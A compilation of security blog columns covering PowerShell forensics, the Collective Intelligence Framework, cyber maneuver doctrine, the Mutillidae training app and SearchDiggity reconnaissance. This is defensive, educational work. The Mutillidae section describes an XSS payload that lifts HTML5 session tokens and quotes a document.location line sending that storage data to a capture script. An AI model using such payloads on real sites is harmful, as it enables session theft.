import-module -name D:\tools\powershell\Get-NetworkStatistics.psm1 –verbose
Thereafter, Get-NetworkStatistics will simply be available on demand. Issuing Get-NetworkStatistics | where{$_.PID -eq '9512'} | format-table reveals all our suspicions and closes the loop as seen in Figure 4.

Figure 4: Mapping PID to port and process
TapiSrv is PID 9512 and listening on port 31337. There’s the evil backdoor.

Ed also described using PowerShell for log analysis. In the above mentioned Evil Through The Lens of Web Logs research paper, I used Log Parser-related tools. Early stages of this research were also included in the April 2012 toolsmith column on Log Parser Lizard. Can one conduct similar activity without Log Parser via PowerShell? Of course. Tim Medin, of CommandLine Kung Fu (one of my absolute favorite blogs), wrote the sweet little PowerShell IIS LogObjectifier. Saved as a script or modularized, Tim’s code allows you to search by common IIS log field identifiers such as UriStem,UriQuery, UserAgent,andWin32Status. Utilizing the same log sample analyzed for the research paper, as well as similar principles, I set a PowerShell query using Tim’s script to identify log entries with 500 status codes from a specific SourceIp as an example. Imagine we have reason to suspect that SourceIp of a SQL injection attack. The query, .\objectify.ps1 $log | where{$_.Win32Status -eq '500' -and $_.SourceIp -eq '78.46.28.97'} resulted in Figure 5.

Figure 5: IIS log objectified via PowerShell
As you can see, 78.46.28.97 made an attempt to inject a HEX-obfuscated DECLARE statement into the victim application.

The possibilities are endless. I didn’t even touch the concepts of PowerShell remoting or running PowerShell cmdlets at scale. Did I mention the possibilities are endless? Hopefully, this brief synopsis whets your appetite.

In Conclusion

So much data, not enough time or word space. There is clearly so much that can be done with Windows PowerShell. The last resource I’ll share with you may become your PowerShell dashboard: A Task-Based Guide toWindows PowerShell Cmdlets. This resource will send you right down the rabbit hole as you further explore what we’ve started here. No reason not to head there now. Much thanks to Ed Wilson for supporting this exploration.
Ping me via email if you have questions (russ at holisticinfosec dot org).
Cheers…until next month.

Acknowledgements

Ed Wilson (The Scripting Guy) for content and endless insight on PowerShell.



toolsmith: Collective Intelligence Framework

$
0
0





Prerequisites
Linux for server, stable on Debian Lenny and Squeeze, and Ubuntu v10
Perl for client (stable), Python client currently unstable

Introduction

As is often the case when plumbing the depths of my feed reader or the Dragon News Bytes mailing list I found toolsmith gold. Kyle Maxwell’s Introduction to the Collective IntelligenceFramework(CIF) lit up on my radar screen. CIF parses data from sources such as ZeuS and SpyEye Tracker, Malware Domains, Spamhaus, Shadowserver, Dragon Research Group, and others. The disparate data is then normalized into repository that allows chronological threat intelligence gathering.   Kyle’s article is an excellent starting point that you should definitely read, but I wanted to hear more from Wes Young, the CIF developer, who kindly filled me in with some background and a look forward. Wes is a Principal Security Engineer for REN-ISAC whose mission is to aid and promote cyber security operational protection and response within the higher education and research (R&E) communities. As such the tenor of his feedback makes all the more sense.
The CIF project has been an interesting experiment for us. When we first decided to transition the core components from incubation in a private trust-based community, to a more traditional open-source community model, it was merely to better support our existing community. We figured, if things were open-source, our community would have an easier time replicating our tools and processes to fit their own needs internally. If others outside the educational space benefited from that (private sector, government sector, etc), then that'd be the icing on the cake.
Years later, we discovered that ratio has nearly inverted itself. Now the CIF community has become lopsided, with the majority of users being from the international public and private spaces. Furthermore, the contribution in terms of testing, bug-fixes, documentation contributions and [more importantly] the word-of-mouth endorsements has driven CIF to become its own living organism. The demonstrated value it has created for threat analysts, who have traditionally had to beg-borrow-and-steal their own intelligence, has become immeasurable in relation to the minor investment of adoption.
As this project's momentum has given it a life all its own, future roadmapswill build off its current success. The ultimate goal of the CIF project is to create a uniform presence of your intelligence, somewhere you control. It'll read your blogs, your sandboxes, and yes, even your email (if you allow it), correlating and digging out threat information that's been traditionally locked in plain, wiki-fied or semi-formatted text. It has enabled organizations to defend their networks with up to the second intelligence from traditional data-sources as well as their peers. While traditional SEMs enable analysts to search their data, CIF enables your data to adapt your network, seamlessly and on the fly. It's your own personal Skynet. :)

Readers may enjoy Wes’ recent interview on the genesis of CIF, available as a FIRST 2012 podcast.
You may also wish to take a close look at Martin Holste’s integration of CIF with his Enterprise Log Search and Archive (ELSA) solution, a centralized syslog framework. Martin has utilized the Sphinx full-text search engine to create accelerated query functionality and a full web front end.

Installing CIF

The documentation found on the CIF wikishould be considered “must read” from top to bottom before proceeding. I won’t repeat what’s also been said (Kyle’s article has some installation pointers too), but I went through the process a couple of times to get it right so I’ll share my experience. There are a number of elements to consider if implementing CIF in a production capacity. While I installed a test instance on insignificant hardware running Debian Squeeze, if you have a 64-bit system with 8GB of RAM or more and a minimum of four cores with drive space to grow into, definitely use it for CIF. If you can also install a fresh OS, pay special attention to your disk layoutwhile configuring partition mapping during the Large Volume Manager (LVM) setup. Also follow the postgres database configuration steps closely if working from a fresh install. You’ll be changing ident sameuser to trust in pg_hba.conf for socket connections. On weak little systems such as my test server, Kyle’s suggestion to update work_mem to 512MB and checkpoint_segments to 32 in postgresql.conf is a good one. The BIND setupis quite straightforward, but again per Kyle’s feedback, make sure your forwarder IP addresses in /etc/resolv.conf match those you configure in /etc/bind/named.conf.options.
From there the install steps on the wiki can be followed verbatim. During the Load Data phase of configuration you may run into an XML parsing issue. After executing time /opt/cif/bin/cif_crontool -f -d && /opt/cif/bin/cif_crontool -d -p daily && /opt/cif/bin/cif_crontool -d -p hourly you may receive an error. The cif_crontool script is similar to cron, as I hope you’ve sagely intuited for yourself, where it calls cif_feedparser to traverse and load CIF configuration files then instructs cif_feedparser based on the configs. The error, :170937: parser error : Sequence ']]>' not allowed in content, crops up when cif_crontool attempts to parse the cleanmx feed definition in /opt/cif/etc/misc.cfg. You can resolve this by simply commenting out that definition. Wes is reaching out to clean-mx.de to get this fixed, right now there are no other options than to comment out the feed.
To install a client you need only follow the Client Setupsteps, and in your ~/.cif file apply the apikey that you created during the server install as described in CIF Config. Don’t forget to configure .cif to generate feed as also described in this section.
A final installation note: if you don’t feel like spending the time to do your own build you have the option to utilize a preconfigured Amazon EC2 instance(limited disk space, not production-ready).

Using CIF

You should set the following up, per the Server Install, as a cron job but for manual reference if you wish to update your data at random intervals, run as sudo su - cif:
1)  PATH=/bin:/usr/local/bin:/opt/cif/bin
2)      Pull feed data:
a.  cif_crontool -p daily -T low
b.  cif_crontool -p hourly -T low
3)      Crunch the data: cif_analytic -d -t 16 -m 2500 (you can up –t and –m on beefier systems but it my grind your system down)
4)      Update the feeds: cif_feeds
You can run cif from the command line; cif –h will give you all the options, cif –q where query string is an IP, URL, domain, etc. will get you started. Pay special attention to the –pparameter as it helps you define output formats such as HTML or Snort.
I immediately installed the Firefox CIF toolbar, you’ll find details on the wiki under Client | Toolbars | Firefoxas it make queries via the browser, leveraging the API a no-brainer. See WebAPI on the wiki under API. Screen shots included hereafter will be of CIF usage via this interface (easier than manually populating query URLs).
There a number of client examplesavailable on the wiki, but I’m always one to throw real-world scenarios at the tool du jour. As ZeuS developers continue to “innovate” and produce modules such as the recently discovered two-factor authentication bypass, ZeuS continues in increased usage by cybercriminals. As may likely be the common scenario, an end user on the network you try desperately to protect has called you to say that they tried to update Firefox via a link “someone sent them” but it “didn’t look right” and that they were worried “something was wrong.” You run netstat –ano on their system and see a suspicious connection, specifically 193.106.31.68. Ruh-roh, Rastro, that IP lives in the Ukraine. Go figure. What does Master Cifu say? Figure 1 fills us in.

FIGURE 1: CIF says “here be dragons”
I love mazilla-update.com, bad guy squatter genius. You need only web search ASN 49335 to learn that NCONNECT-AS Navitel Rusconnect Ltd is not a good neighborhood for your end user to be playing in. Better yet, cif –q AS49335 at the command line or drop AS49335 in the Firefox search box.
Figure 2 is a case in point, Navitel Rusconnect Ltd is definitely the wrong side of the tracks.

FIGURE 2: Can I catch a bus out of here?
 ZeuS configs and binaries, SpyEye, stolen credit card gateway, oh my.
This is a good time for a quick overview of taxonomy. Per the wiki, severity equates to seriousness, confidence denotes faith in the observation, and impact is a profile for badness (ZeuS, botnet, etc.).
Our above mentioned user does show mazilla-update.com in their browser history, let’s query it via CIF.
Figure 3 further validates suspicions.

FIGURE 3: Mazilla <> Mozilla
 You quickly discern that your end user downloaded bt.exe from mazilla-update.com. You take a quick md5sum of the binary and drop the hash in the CIF search box. 756447e177fc3cc39912797b7ecb2f92 bears instant fruit as seen in Figure 4.

FIGURE 4: CIF hash search
 Yep, looks like your end user might have gotten himself some ZeuS action.
With a resource such as CIF at your fingertips you should be able to quickly envision value added when using a DNS sinkhole (hello 127.0.0.1) or DNS-BH from malwaredomains.com where you serve up fake replies to any request for the likes of mazilla-update.com. Bonus! Beefy server for CIF: $2499. CIF licensing: $0. Bad guy fail? Priceless.

In Conclusion

Check out the Idea List in the CIF Projects Lab; there is some excellent work to be done including a VMWare appliance, further Snort integration, a Virus Total analytic, and others. This project, like so many others we’ve discussed in toolsmith, grows and prospers with your feedback and contributions. Please consider participating by joining the CIF Google Group and jumping in. You’ll also want to check out the DFIR Journal’s CIF discussions, including integration with ArcSight, as well as EyeIS’s CIF incorporation with Splunk. These are the same folks who have brought us Security Onion 1.0 for Splunk, so I’m imaging all the possibilities for integration. Get busy with CIF, folks. It’s a work in progress but a damned good one at that.
Ping me via email if you have questions (russ at holisticinfosec dot org).
Cheers…until next month.

Acknowledgements

Wes Young, CIF developer, Principal Security Engineer, REN-ISAC

MORPHINATOR & cyber maneuver as a defensive tactic

$
0
0
In June I read an outstanding paper from MAJ Scott Applegate, US Army, entitled The Principle of Maneuver in Cyber Operations, written as part of his work at George Mason University.
Then yesterday, I spotted a headline indicating that US Army has awarded a contract to Raytheon to develop technology for Morphing Network Assets to Restrict Adversarial Reconnaissance, or MORPHINATOR.
Aside from what might be the greatest acronym of all time (take that, APT) MORPHINATOR represents a defensive tactic well worthy of consideration in the private sector as well. While the Raytheon article is basically just a press release, I strongly advocate your reading MAJ Applegate's paper at earliest convenience. I will restate the principles for you here in the understanding that these are, for me, the highlights of this excellent research, as you might consider them for private sector use, and are to be entirely attributed to MAJ Applegate.
First, understand that the United States Military describes the concept of maneuver as "the disposition of forces to conduct operations by securing positional advantages before and or during combat operations."
MAJ Applegate proposes that the principles of maneuver as defined above require a significant amount of rethinking when applied to the virtual realm that constitutes cyberspace. "The methods and processes employed to attack and defend information resources in cyberspace constitute maneuver as they are undertaken to give one actor a competitive advantage over another."
While cyber maneuver as described in this paper include elements of offensive and defensive tactics, I think it most reasonable to explore defensive tactics as the primary mission when applied to the private sector.
While I privately and cautiously advocate active defense (offensive reaction to an attack) I'm not aware of too many corporate entities who readily embrace direct or overt offensive tactics.
The paper indicates that: "Cyber maneuver leverages positioning in the cyberspace domain to disrupt, deny, degrade, destroy, or manipulate computing and information resources. It is used to apply force, deny operation of or gain access to key information stores or strategically valuable systems." While this reads as a more offense-oriented statement, carry forward disrupt, deny, degrade, and manipulate to a defensive mindset.
Applying parts of MAJ Applegate's characteristics of cyber maneuver to defensive tactics would include speed, operational reach, dynamic evolution, rapid concentration, non-serial and distributed. Consider these in the context of private sector networks while reviewing direct quotes from the paper as such.
  • Speed: "Actions in cyberspace can be virtually instantaneous, happening at machine speeds."
  • Operational Reach: "Reach in cyber operations tends to be limited by the scale of maneuver and the ability of an element to shield its actions from enemy observation, detection and reaction."
  • Dynamic evolution: "Recent years have seen rise to heavy use of web based applications, cloud computing, smart phones, and converging technologies. This ongoing evolution leads to constant changes in tactics, techniques and procedures used by both attackers and defenders in cyberspace."
  • Non-serial and distributed: "Maneuver in cyberspace allows attackers and defenders to simultaneously conduct actions across multiple systems at multiple levels of warfare. For defenders, this can mean hardening multiple systems simultaneously when new threats are discovered, killing multiple access points during attacks, collecting and correlating data from multiple sensors in parallel or other defensive actions."

Incorporating the above characteristics as part of defensive tactics for the private sector does not negate the need to fully understand and defend against the additional characteristics found in the research including access & control, stealth & limited attribution, and rapid concentration. Liken access & control here to a "forward base" concept allowing attackers "to move the point of attack forward." Stealth & limited attribution clarifies that while action in cyberspace is "observable" most actions are not observed in a meaningful way." Think of this, in all seriousness as "what you don't know will kill you." Rapid concentration represents the mass effect of botnets and DDoS attacks and the ease with which they're deployed in cyberspace. As defenders we must be entirely cognitive of these elements and ensure agility in our response to the threats they represent.

Now to close the loop (analogy intended, see the paper's reference to an OODA (Observe-Orient-Decide-Act) loop) as it pertains to defensive tactics. The Principle of Maneuver in Cyber Operations offers four Basic Forms of Defensive Cyber Maneuver, three of which directly apply to private sector network operations.
  1. Perimeter Defense & Defense in Depth: Well known, well discussed, but not always well-done. "While defense in depth is a more effective strategy than a line defense, both these defensive formations suffer from the fact that they are fixed targets with relatively static defenses which an enemy can spend time and resources probing for vulnerabilities with little or no threat of retaliation."
  2. Moving Target Defense: "This form of defensive maneuver uses technical mechanisms to constantly shift certain aspects of targeted systems to make it much more difficult for an attacker to be able to identify, target and successfully attack a target." This can be system level address space layout randomization (ASLR) or constantly moving virtual resources in cloud-based infrastructure.
  3. Deceptive Defense: "The use use of these types of (honeypots) systems can allow a defender to regain the initiative by stalling an attack, giving the defender time to gather information on the attack methodology and then adjusting other defensive systems to account for the attacker’s tactics, techniques and procedures."
Drawing from part of MAJ Applegate's conclusion, when considering the principles described herein, "while maneuver in cyberspace is uniquely different than its kinetic counterparts, its objective remains the same, to gain a position of advantage over a competitor and to leverage that position for decisive success. It is therefore important to continue to study and define the evolving principle of maneuver in cyberspace to ensure the success of operations in this new warfighting domain."
I contend this is not a war pending, but a war upon us.
 While The Principle of Maneuver in Cyber Operations discusses this declaration specific to military operations, we are well advised to consider this precision of message in the private sector. GEN Keith Alexander, U.S. Cyber Command chief and the director of the National Security Agency, was recently quoted as saying that the loss of intellectual property due to cyber attacks amounts to the “greatest transfer of wealth in human history.” GEN Alexander went on to say "What I’m concerned about is the transition from disruptive to destructive attacks and I think that’s coming. We have to be ready for that."
Private sector and military resources alike need to think in these terms and act decisively. Cyber maneuver tactics offer intriguing options to be certain.
Use MAJ Applegate's fine work as reference material to perpetuate this conversation, and may the MORPHINATOR be with you.

toolsmith: NOWASP Mutillidae

$
0
0




Prerequisites
XAMPP is most convenient
NOWASP can be configured to run on Linux, Mac, and Windows

Introduction
I’m writing this month’s column fresh on the heels of presenting OWASP Top 10 Tools and Tactics for a SANS @Night event at the SANFIRE 2012 conference in Washington, DC. A quick shout out to my fellow Internet Storm Center handlers who I met there, along with all the excellent folks I met while attending the event. During the presentation I used Damn Vulnerable Web Application (DVWA) as a vulnerable test bed against which I demonstrated a number of web application assessment tools. Having been a longtime OWASP Webgoat user for such purposes, I had recently learned of DVWA from a great article on the PenTest Laboratory site entitled 10 Vulnerable Web Applications You Can Play With. As one who likens himself to a dog or a crow with AADD ("Look! Squirrel! Shiny object!), I literally read the article only enough to learn about DVWA and run down that rabbit hole never to look back. There are of course other excellent resources in the article and it is with a red face and a sense of irony that I can tell you the author of the second vulnerable web application on the list was in the audience for the above mentioned presentation. Jeremy Druin was extremely gracious and patiently waited until my presentation was over to tell me about his NOWASP Mutillidae. Had I only read that article past the first paragraph. Ah well, never too late to make amends. Jeremy’s timing was impeccable and fortuitous as there I was in search of this month’s topic. I immediately recruited him and asked for the requisite rundown on his creation.
"Mutillidae 2.x started with the idea to add "levels" to Mutillidae 1.x (created by Adrian Irongeek Crenshaw) with the idea that "level 0" would have no protection and "level 5" would have maximum protection. It was later discovered Mutillidae 1.x could not be easily upgraded and the project was rewritten and released in a separate fork. (Version 1.x is still available.). Once the Mutillidae 2.x fork was launched, several new vulnerabilities were added such that all OWASP 2007 and 2010 vulnerabilities were represented along with several others such as cross-frame scripting, forms-caching, information leakage via comments and html5 web-storage takeover.
Additional functionality was added to support CTF (capture the flag) contests such as a page which automatically captures and logs all cookies, get, and post parameters of any user that "visits". A second page displays all captured data along with the users IP address and the time of the capture. Based on feedback from users, the "hints" functionality was greatly expanded by making three levels of hints with increasing verbosity, adding several hundred extra hints including source code, and having "bubbles" pop-up in critically vulnerable areas when the user hovers over a particularly good target (i.e. a vulnerable input field).
"

Jeremy also pointed out that video tutorials have been posted to the webpwnized YouTube Channel detailing how to use tools and exploit the system. There are dozens of videos showing how to use Burp Suite, w3af, and netcat along with several videos dedicated to exploits such as SQL injection, cross-site scripting, html-5 web storage alteration, and command injection. New video posts as well as new release notices for Mutillidae are tweeted to @webpwnized.

Installing NOWASP Mutillidae
If you choose to install NOWASP on a LAMP or XAMPP stack and are having database connectivity issues, note that NOWASP is configured for root with a blank password to connect to MySQL. You’ll need to provide the correct settings to connect to your MySQL instance on line 16 in /mutillidae/classes/MySQLHandler.php and line 11 in /mutillidae/config.inc. It’s already properly configured if you choose to utilize the Samurai WTF distribution, so no need to change it there.
I built Mutillidae from scratch quite easily on an Ubuntu 11.04 virtual machine and once making the above mentioned configuration updates Mutillidae was immediately functional.

Using NOSWASP Mutillidae

According to Jeremy, "Mutillidae is being used as a web security training environment for corporate developer training where developers learn not only how web exploits work but how to exploit the sites themselves. Armed with this knowledge, they appreciate more readily the importance of writing secure code and understand better how to write secure code. Mutillidae is also used in a similar capacity in the graduate Information Security course at the University of Louisville Speed-Scientific Engineering School. Mutillidae has been included as a target in the Samurai-WTF web pen testing distribution since version 1.x and was recently added to Rapid7's Metasploitable-2 project. Over the last couple of years, Mutillidae has been part of CTF (capture the flag) competitions at Kentuckiana ISSA conferences and the 2012 AIDE Conference held at Marshall University. Because Mutillidae provides a well-understood set of vulnerabilities beyond the OWASP Top 10, it is used as a platform to evaluate security assessment tools in order to see which issues the tool can identify."
No time like the present to see what all positive feedback is all about. Adrian has a great video on the Irongeek site describing five of the most well-known vulnerabilities found in the 2007 OWASP Top 10, specifically cross-site scripting (XSS), SQL/command injection flaws, malicious file execution, insecure direct object reference, and cross-site request forgery (CSRF/XSRF). Don’t forget the webpwnized YouTube channel as well! To break with what’s already well documented I’ve opted here to discuss discovery of some of the less well known or popular vulnerabilities.
I’ll start you out of sequence in the OWASP Top 10 2010 with A8 - Failure To Restrict URL Access. Directly from the OWASP A8 description, applications do not always protect page requests properly. "Sometimes, URL protection is managed via configuration, and the system is misconfigured. Sometimes, developers must include the proper code checks, and they forget. Detecting such flaws is easy. The hardest part is identifying which pages (URLs) exist to attack." What’s one of the best ways to discover potentially unrestricted URLs that should otherwise be protected? At the top on my list of first things to do during penetration tests is check for a robots.txt file. Robots.txt is usually used to teach search crawlers how to behave when interacting with your site (thou shalt not crawl) but it’s always used by attackers, good and bad, to find interesting functionality or pages you don’t wish dissected. Mutillidae teaches a quick lesson here via http://192.168.195.128/mutillidae/robots.txt as seen in Figure 1.

Figure 1: Explore me
We find more than a few nuggets of goodness here to which access should never be allowed on sites you care anything about or don’t want tipped over in mere minutes if exposed to the Internet. No need to read documentation or conduct a web search for an account with which to log in to Mutillidae, the accounts.txt file in the exposed passwords directory will provide you everything you need. The config.inc file and the classes directory are freely available for browsing, config.inc will dump the above mentioned MySQL database connection strings. We’ll use content from the javascript directory against Mutillidae later in this discussion, and it’s never a good idea to expose your site’s documentation or the libraries you utilize to protect your site. The owasp-esapi-php directory contains the libraries and source code associated with the OWASP Enterprise Security API  which, when properly configured and restricted, is an excellent method for protecting your site from OWASP Top 10 vulnerabilities.

The OWASP Top 10 2010 A8 category is closely related to A6 - Security Misconfiguration; I really consider Failure to Restrict URL Access a subset of the A6 category. A6 also includes scenarios such as an application server configuration that "allows stack traces to be returned to users, potentially exposing underlying flaws. Attackers love the extra information error messages provide." So true. While playing with Mutillidae to learn about the Top 10 2010 A1 - Injection category you may benefit from a nice example of improper error handling as seen in Figure 2.

Figure 2: Failure is always an option


HTML 5 Web Storage serves as a great example of OWASP Top 10 2010-A7-Insecure Cryptographic Storage. It represents storage, sure, but when configured as badly (by design) as it on Mutillidae no cryptography will save you. Case in point, HTML 5 local storage. Take note of localStorage.getItem and setItem calls implemented in HTML5 pages as they help detect when developers build solutions that put sensitive information in local storage, which is a bad practice . Mutillidae offers excellent examples of ways to take advantage of getItem/setItem fail. You’ll find some detailed test scripts to experiment with and modify in the Mutillidae documentation folder. Remember I said it’s a good idea to protect documentation folders? I tweaked one of the examples to express my feelings for Mutillidae (setItem via MOD) and mock the victim while lifting their session data via XSS:

MOUSEOVER me and I’ll rob you blind! 

Figure 3 shows the resulting alert.

Figure 3: GotItem...like your Secure.Authentication token
While this example spawns an alert window when moused over but it could have just as easily been configured to write the results to an evil server. Mutillidae plays similarly for your pwn pleasure via the capture-data.php script by defining the likes of document.location="http://localhost/mutillidae/capture-data.php?html5storage=" in test scripts.

Finally, a quick look at OWASP Top 10 2010-A10-Unvalidated Redirects and Forwards with Burp Suite Pro. Among the plethora of other vulnerabilities readily discovered with Burp’s Scanner functionality, it’s my favorite tool for discovering open redirects too. Browse the Mutillidae menu for OWASP Top 10 then A10 and scan the Credits page. Your results should match mine as seen in Figure 4.


Figure 4: forwardurl...to wherever you’d like
From CWE-601 : "An HTTP parameter may contain a URL value and could cause the web application to redirect the request to the specified URL. By modifying the URL value to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials. Because the server name in the modified link is identical to the original site, phishing attempts have a more trustworthy appearance."
We wouldn’t want that would we?
Clearly, Mutillidae as a learning tool is indispensable. Make use of it for your own learning as well as that of the development teams you support. Weave it into your SDLC practices, you can’t go wrong.

In Conclusion

In late September, the current release of Mutillidae will be introduced at the upcoming annual Kentuckiana ISSA InfoSec Conference in Louisville, KY. This conference includes four different tracks with Mutillidae slated as one of the breakout sessions in the web application security track. All you Kentucky- area ISSA members (and non-member readers) please consider attending and discovering more about this great learning tool. Everyone else, setup Mutillidae immediately, sit down with your developer teams, and ensure their full understanding of how important secure coding practices are. Use Mutillidae as a tool to help them achieve that understanding.
Ping me via email if you have questions (russ at holisticinfosec dot org).
Cheers...until next month.

Acknowledgements

Jeremy Druin, NOWASP Mutillidae 2.0 developer

toolsmith: SearchDiggity - Dig Before They Do

$
0
0











Prerequisites
Windows .NET Framework

Introduction
I’ve been conducting quite a bit of open source intelligence gathering (OSINT) recently as part of a variety of engagements and realized I hadn’t discussed the subject since we last reviewed FOCA in March 2011 or Search Engine Security Auditing in June 2007. I’d recently had a few hits on my feed reader, and at least via one mailing lists, regarding SearchDiggity from Fran Brown and Rob Ragan of Stach & Liu. They’d recently presented Pulp Google Hacking at the 4thAnnual InfoSec Summit at ISSA Los Angeles as well as Tenacious Diggity at DEFCON 20 and the content certainly piqued my interest. One quick look at the framework and all its features and I was immediately intrigued. At first glance you note similarities to Wikto and FOCA given Search Diggity’s use of the Google Hacking Database and Shodan. This is no small irony as this team has taken point on rejuvenating the art of the search engine hack. In Fran’s InformationWeek report, Using Google to Find Vulnerabilities In YourIT Environment, he discusses toolsmith favorites FOCA, Maltego, and Shodan amongst others. I’ll paraphrase Fran from this March 2012 whitepaper to frame why using tools such as SearchDiggity and others in the Diggity arsenal is so important. Use these same methods to find flaws before the bad guys do; these methods use search engines such as Google and Bing to identify vulnerabilities in your applications, systems and services allowing you to fix them before they can be exploited. Fran and Rob’s work has even hit mainstream media with the likes of NotInMyBackyard (included in SearchDiggity) achieving coverage in USA Today. Suffice it to say that downloads from the Google Hacking Diggity Project pages jumped by 45,000 almost immediately, fueled largely by non-security consumers looking to discover any sensitive data leaks related to themselves or their organizations. A nice problem to have for the pair from Stach & Liu and one Fran addressed with a blogpost to provide a quick intro to NotInMyBackYardDiggity, to be discussed in more detail later in this article.  
I reached out to Fran and Rob rather late in this month’s writing process and am indebted to them as they kindly accommodated me with a number of resources as well a few minutes for questions via telephone. There are Diggity-related videos and tool screenshots as well as all the presentations the team has given in the last few years. The SearchDiggity team is most proud of their latest additions to the toolset, including NotInMyBackyard and PortScan. Keep in mind that, like so many tools discussed in toolsmith, SeachDiggity and its various elements were written to accommodate the needs of the developers during their own penetration tests and assessments. No cached data is safe from the Diggity Duo’s next generation search engine hacking arsenal and all their tools are free for download and use.

Installing Search Diggity

SearchDiggity installation is point-and-click simple after downloading the installation package, but there are few recommendations for your consideration. The default installation path is C:\Program Files (x86) \SearchDiggity, but consider using a non-system drive as an installation target to ensure no permissions anomalies; I installed in D:\tools\SearchDiggity. SearchDiggity writes results files to DiggityDownloads(I set D:\tools\DiggityDownloadsunder OptionsàSettingsàGeneral) and will need permission to its root in order to Update Query Definitions (search strings, Google/Bing Dorks).  

Using SearchDiggity

I started my review of SearchDiggity capabilities with the Bing Hacking Database (BHDB) under the Bing tab and utilizing the menu referred to as BHDBv2NEW as seen in Figure 1.

Figure 1: A BHDB analysis of HolisticInfosec.org
As with any tool, optimization of your scan settings for your target before you start the scan run is highly recommended. Given that my site is not an Adobe Coldfusion offering there’s really no need to look for CFIDE references, right? Ditto for Outlook Web Access or SharePoint, but CMS Config Files with XSS and SQL injection instreamset options are definitely in order. Good news, no significant findings were noted using my domain as the target.

NotInMyBackyard is a recent addition to SearchDiggity for which the team has garnered a lot of deserved attention and as such we’ll explore it here. I used my name as my primary search parameter and configured Methodsto include Quotes, and set Locations to include:
1)      Cloud Storage (Dropbox, Google Docs, Microsoft Skydrive, Amazon AWS)
2)      Document Sharing (scribd.com, 4shared.com, issuu.com, docstoc.com, wepapers.com)
3)      Pastebin(pastebin.com, snipt.org, drupalbin.com, paste.ubuntu.com, tinypaste.com, paste2.org, codepad.org, dpaste.com, pastie.org, pastebin.mozilla.org)
4)      Social(Facebook, Twitter, YouTube, LinkedIn)
5)      Forums(groups.google.com)
6)      Public presentations charts graphs videos (Slideshare, Prezi, present.me, Gliffy, Vimeo, Dailymotion, Metacafe)
You can opt to set additional parameters such as Extensionsfor document types including all versions of Microsoft Office, PDF,CSV, TXT, database types including MS-SQL and Access, backup, logs, and config files, as well as test and script files. My favorites (utilized in a separate run) are the financial file options including Quicken and QuickBooks data files and QuickBooks backup files. Finally, there are a number of granular keyword selections to narrow your query results that might include your patient records, places of birth, or your name in a data dump. This is extremely useful when trying to determine if your email address, as associated with one of your primary accounts, has been accumulated in a data dump posted to a Pastebin-like offering. Just keep in mind, the more options you select the longer your query run will take. I typically carve my searches up in specific categories then export the results to a file named for the category.
As seen in Figure 2, NotInMyBackyard reveals all available query results in a clean, legible manner that includes hyperlinks to the referenced results, allowing you to validate the findings.

Figure 2: NotInMyBackyard flushes out results
I found that my search, as configured, was more enlightening specific to all the copies of my material posted to other sites without my permission. It was also interesting to see where articles and presentation material were cited in academic material. Imagine using your organizational domain name, and specific keywords and accounts to discover what’s exposed to the evildoers conducting the same activity.
You can focus similar activity with more attention to the enterprise mindset utilizing SearchDiggity’s DLP offerings. First conduct a Google or Bing run against a domain of interest using the DLPDiggity Initial selection. Once the query run is complete, highlight all the files (CTRL-A works well), and click the download button. This will download all the files to the download directory you configured, populating it with files discovered using DLPDiggity Initial, against which you can then apply the full DLP menu. I did as described against a target that shall remain unnamed and found either valid findings or sample/example data that matched the search regex explicitly as seen in Figure 3.

Figure 3: Data Leak Prevention with SearchDiggity
 I only used the Quick Checks set here too. When you contemplate the likes of database connection strings, bank account numbers, and encryption-related findings, coupled with the requisite credit cards, SSNs, and other PII, it becomes immediately apparent how powerful this tool is for both prevention and discovery during the reconnaissance phase of a penetration test.

I’ll cover one more SearchDiggity component but as is usually the case with toolsmith topics there is much about the tool du jour that remains unsaid. Be sure to check out the SearchDiggity Shodan and PortScan offerings on your own. I’m always particularly interested in Flash-related FAIL findings and SearchDiggity won’t disappoint here either. Start with a Google or Bing search against a target domain with FlashDiggity Initial enabled. Much as noted with the DLP feature, after discovery, SearchDiggity will download the SWF files it identifies with FlashDiggity Initial. As an example I ran this configuration without a domain specified. By default, for a Google search, 70 results per query will be returned. Suffice it to say that with the three specific queries defined in FlashDiggity Initial searches, I was quickly treated to 210 results which I then opted to download. I switched over the Flash menu and for real s’s and g’s (work that one out on your own :-)) enabled alloptions. Figure 4 exemplifies (anonymously) just how concerning certain Flash implementations may be, particularly when utilized for administrative functions and authentication.

Figure 4: Find bad Flash with SearchDiggity
 FlashDiggity decompiles the downloaded SWF files with Flare and stores the resulting .flr file in the download directory for your review. It should go without saying that flaw enumeration becomes all that much easier. As an example, FlashDiggity’s getURL XSS detection discovered the following using geturl\(.*(_root\.|_level0\.|_global\.).*\)as its regex logic:  
this.getURL('mailto:' + _global.escape(this.decodeEmailAddr(v2.emladdr)) + '?subject=' + _global.escape(v2.emlsubj) + '&body=' + _global.escape(this.getEmailContent()));
This snippet makes for interesting analysis. Risks associated with getURLare well documented but the global escape may mitigate the issue. That said, the Flash file was created with Techsmith Camtasia in January 2009, and an XSS vulnerability was reported in October 2009 regarding SWF files created with Camtasia Studio. Yet, SWF files hosted on TechSmith’s Screencast service were not vulnerable and more than one reference to Screencast was noted in the decompiled .flr file. With one FlashDiggity search, we were able to learn a great deal about potentially flawed Flash files subject to possible exploit.
And we didn’t even touch SearchDiggity’s malware analysis feature set.  

In Conclusion

As always I’ll remind you, please use SearchDiggity for good, not evil. Incorporating its use as part of your organizational defensive tactics is a worthy effort. Keep in mind that you can also leverage this logic as part of Google Hacking Diggity Defense Tools including Alert and Monitoring RSS feeds. Configure them with your specific and desired organizational parameters and enjoy real time alerting and monitoring via your RSS feed reader. For those of you defending Internet-facing SharePoint implementations you’ll definitely want to check out the SharePoint Diggity Hacking Project too.
Enjoy this tool arsenal from Stach & Liu’s Dynamic Duo; they’d love to hear from you with kudos, constructive criticism, and feature requests via diggity at stachliu.com.
Ping me via email if you have questions (russ at holisticinfosec dot org).
Cheers…until next month.

Acknowledgements

Francis Brown and Rob Ragan, Managing Partners, Stach & Liu, Google Hacking Diggity project leads

The replacement security analyst's Top 10

$
0
0
I'm a huge football fan so the depth of my joy at the return of the "real" NFL referees cannot be measured. Given the replacement ref debacle I felt compelled to share a replacement security analyst's Top 10.
Note: at one time or another in my career I have truly heard all of these.
In no particular order...

  1. Disable AV altogether, its inconvenient when moving malware samples around.
  2. Passwords longer than eight characters make it hard to do your job.
  3. Don't worry about chain of custody or evidence integrity, cases rarely go to court anyway.
  4. When a concerned user calls about a potentially compromised system, tell them to just run McAfee Stinger.
  5. Why would you want to keep DNS logs?
